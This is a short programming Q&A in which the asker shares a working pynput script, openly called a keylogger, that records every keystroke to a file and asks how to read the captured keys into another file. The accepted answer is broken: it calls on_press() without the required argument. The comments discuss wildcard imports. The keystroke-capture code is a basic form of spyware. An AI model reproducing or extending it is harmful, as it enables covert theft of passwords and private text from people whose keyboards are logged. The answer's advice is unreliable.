# Send data from one python file to another

Tags: python, keylogger

I have two python files `k.py` & `key.py`

I'm creating a keylogger & the code is in k.py

k.py code

```
from pynput.keyboard import Key, Listener
import logging

logging.basicConfig(filename = ("key.py"), level=logging.DEBUG, format='%(message)s')
def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()
```

I'm sending this to `key.py`, So my question is how can i recieve the data from `k.py` & store it into a variable

Answer (score 0, accepted):

**key.py**

```
from k import *
 
# calling functions
# new use this funcation
on_press()
```

Comment: Wildcard imports are typically discouraged, so you may want to change the first line `from k import on_press`

Comment: Yes frippe, This is also work but if u import * than you access all funcatin in your file . this batter for only your create file not for any python package. what you say this is better for any python package.

Comment: I didn't say that it doesn't work, but that it's discouraged. It's discouraged because it pollutes the namespace